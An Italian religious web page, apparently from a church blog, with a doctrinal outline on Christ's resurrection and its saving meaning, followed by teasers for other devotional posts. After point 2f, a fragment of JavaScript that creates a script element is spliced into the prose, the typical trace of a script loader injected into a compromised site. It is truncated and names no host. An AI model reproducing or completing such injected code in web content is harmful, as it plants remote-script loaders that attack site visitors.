LA RESURREZIONE

INTRODUZIONE: 

Molti vogliono inserire in questo soggetto dottrinale anche le “ipotesi” o le “analisi” relative al ministero di Cristo durante le ore della morte; noi pensiamo che esso prescinde totalmente dall’argomento, mentre invece, può essere considerato pertinente quello della durata della morte.  Matteo 12:40, 10:34; Luca 9:22, 24:46, 18:33; l Corinzi 15:4. Versi tutti che parlano del terzo giorno, ci parlano di tre giorni e tre notti.

Storicamente (dai Vangeli) si può concludere che non sono state 72 ore, ma forse la metà (solo il sabato è stato completo) ed infatti anche la prima letteratura cristiana, per esempio “Il credo: Il terzo giorno…”, non parla di tre giorni e tre notti.

Sono state date molte spiegazioni:

1)    il raffronto con l’episodio di Giona vuole essere figurativo e come per le parabole, più dei particolari propone l’argomento;

2)    la dizione “giorno e notte”, rappresenterebbe una forma idiomatica (simile alla nostra: una giornata), che non sempre si riferisce alla totalità del giorno ma semplicemente alla sua successione astronomica;

3)    qualcuno ha anche avanzato l’ipotesi, che a noi sembra ardita, che Gesù si sia riferito anche al periodo precedente alla sua morte, quando moralmente è sceso nelle parti più basse dell’annichilimento (Filippesi 2:8).

Chiusa questa parentesi introduttiva, entriamo nel vivo dell’argomento.

1-  ASPETTO STORICO DELLA RESURREZIONE.

a)   La resurrezione non ha avuto testimoni (Marco 16:3,4).

Nota: Quando affermiamo che la resurrezione di Cristo è un episodio storico solidamente provato, affermiamo una verità incontrovertibile; ma quando parliamo dei testimoni della resurrezione, dobbiamo precisare che essi hanno verificato oggettivamente un fatto già verificatosi e quindi hanno reso una testimonianza assolutamente valida.

b)   La rimozione della pietra avvenne quando la resurrezione di Gesù era già verificata (Matteo 28:2).

c)    Le condizioni nell’interno della tomba, sembrano parlare di un sereno risveglio e di un corpo, ormai glorificato, che si sottrae da quelli che sono stati prima i suoi necessari rivestimenti (Giovanni 20:5,7).

Nota: Sembra che Dio abbia riservato per Se alcuni atti del ministero di Cristo: l’ingresso nell’umano (Matteo 1:18) e l’uscita dall’umano…

Quindi non “guardie che cadono a ritroso…”, l’immagine tanto cara all’iconografia cattolica, e non discepoli che vedono un corpo che riacquista vita, ma un atto divino che è potenza di resurrezione e trasforma un corpo, da una dimensione fisica, sottoposta alle leggi naturali, ad un corpo spirituale che può usare o superare quelle leggi: Gesù nelle apparizioni, di volta in volta, partecipa a comportamenti umani e manifesta proprietà spirituali: si fa toccare, mangia,… entra a porte chiuse, scompare ecc.;

d)   Le successive apparizioni (l Corinzi 15:5).

Note: Delle apparizioni parleremo specificatamente in seguito.

 2-  SIGNIFICATO SOTERIOLOGICO DELLA RESURREZIONE.

a)   Manifestazione della potenza vittoriosa nel piano della Redenzione. (Efesi 1:19, 20).

Nota: la resurrezione è stata definita la Waterloo dell’inferno (Napoleone non è morto, ma i suoi sogni e le sue ambizioni sono sepolti). Per questo Paolo parla con una successione di aggettivi sembrano “classificare” la potenza della Resurrezione, trasferita in retaggio alla chiesa.

b)   Affermazione esplicita e definitiva della divinità di Cristo (Romani 1:4).

Nota: La morte di Cristo è prova della sua umanità, la resurrezione quella della sua divinità (Giovanni 2:19).

c)    Compimento nel tempo del piano della Redenzione (Romani 4:25).

Nota: Quando, per fede, c’identifichiamo con Cristo crocifisso, accettiamo, nel Suo sacrificio compiuto per noi, la liberazione dalla condanna dal peccato. Quando c’identifichiamo nella Sua resurrezione (Colossesi 3:1) accettiamo pienamente quella nuova condizione che è assenza di presenza e potenza del peccato;

d)   Dimostrazione della Resurrezione, come presente in Cristo. (Giovanni 11:25).

Nota: Risposta celeste a coloro che come Marta concepiscono Cristo soltanto in relazione al passato (se fossi stato qui) o al futuro (So che resusciterà). Gesù era già resurrezione: Egli è l’eterno presente (Ebrei 13:8): Io sono con voi.

e)   Inizio dell’ultimo atto della grazia: la resurrezione è la glorificazione. (I Corinzi 15:20).

Nota: Le molte resurrezioni ricordate dalla Bibbia, sia nell’antico che nel nuovo Testamento, sono semplicemente un temporaneo ritorno alla vita fisica; quella di Cristo è la Resurrezione nella sua pienezza (Apocalisse 1:18; Romani 6:9).

f)     La manifestazione di ciò che saranno i credenti (l Giovanni 3:2; Colossesi 3:4; I Corinzi 15:23).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

COME PREGARE IN PUBBLICO

 di C. H. SPURGEON  –  Un primo scoglio da evitare nella preghiera pubblica è il fatto d’avere troppo in vista l’uditorio e di pregare con lo scopo di piacergli. Guardiamoci dal fare della preghiera una forma indiretta di sermone; le belle preghiere sono spesso delle brutte preghiere. Quando siamo nella presenza dell’Eterno degli eserciti non è buono abbellire il nostro stile per attirarci le approvazioni umane. Le nostre …
Leggi Tutto

PERCHE’ PREDICHIAMO IL BATTESIMO NELLO SPIRITO SANTO

“Ragione storica“. – La cristianità della nostra generazione ha smarrito il significato del messaggio della Pentecoste. Le chiese non guardano più a questa data o a quest’avvenimento come ad una meta che, come è stata raggiunta ieri, deve essere raggiunta, nel succedersi dei secoli, da ogni nuova generazione. La potenza dello Spirito Santo, l’effusione del dono divino, il battesimo celeste promesso da Gesù… sono diventate espressioni teoriche e quindi …
Leggi Tutto

Promessa per oggi: NON SIATE ANSIOSI, IO MI PRENDERÒ CURA DI VOI

Matteo 6: 25-26  –  Perciò io vi dico: Non siate con ansietà solleciti per la vostra vita, di quello che mangerete o berrete, né per il vostro corpo, di che vi vestirete. La vita non vale più del cibo e il corpo più del vestito? Osservate gli uccelli del cielo: essi non seminano, non mietono e non raccolgono in granai; eppure il Padre vostro celeste li nutre. Non …
Leggi Tutto

DIOTREFE

Chi era Diotrefe? Etimologicamente il suo nome significa «nutrito dall’Eterno » e se tale nome era stato scelto dopo la conversione, come è da supporsi, dobbiamo dedurne che in origine questo fedele doveva manifestare le caratteristiche della consacrazione. Nelle scritture facciamo la conoscenza di questo poco noto cristiano leggendo la terza breve epistola di S. Giovanni, in cui si parla di lui in termini poco lusinghieri; viene presentato …
Leggi Tutto

L'AMORE È BENIGNO

di DAVID SKELTON  –  L’ amore è paziente, è benigno. 1 Corinzi 13:4   –   L’amore non è solo passivo che sopporta ogni attacco, ma è anche attivo e fa opere benigne. Matthew Henry, commentando «L’amore è benigno» dice: «Esso è pronto a fare il bene, cerca di essere utile, non coglie solamente l’opportunità quando gli si presenta, ma la cerca». L’amore sarà sempre pronto ad agire. Questo …
Leggi Tutto

PREGARE O REMARE?

di Billy Sunday  –  Billy Sunday era un famoso giocatore di baseball americano. Diede il suo cuore a Cristo e da famoso atleta divenne un famoso predicatore del Vangelo. –  “Gesù Cristo è lo stesso ieri, oggi e in eterno” (Ebrei 13: 8).  –  Soli in un piccolo battello ed esposti a una grande tempesta ci chiediamo: «Dobbiamo pregare o remare?» Viviamo in un mondo nel quale regna il …
Leggi Tutto

Da  D. L. Moody a Billy Graham. Tutto iniziò in un negozio di scarpe...

UNA STORIA SIGNIFICATIVA.  –  Un sabato qualsiasi a Boston, circa 150 anni fa, un tranquillo insegnante di scuola domenicale di  nome Edward Kimball si prese un giorno libero per andare a trovare ogni ragazzo della sua classe. Voleva essere certo che ciascuno avesse ricevuto Cristo. Uno dei suoi studenti lavorava come apprendista nel negozio di scarpe dello zio. Kimball entrò nel negozio ed andò nel magazzino sul retro, …
Leggi Tutto

DAI SERMONI DI ROBERTO BRACCO

LA PAROLA DOLCE (Proverbi 15) …
Leggi Tutto

Dai nostri Culti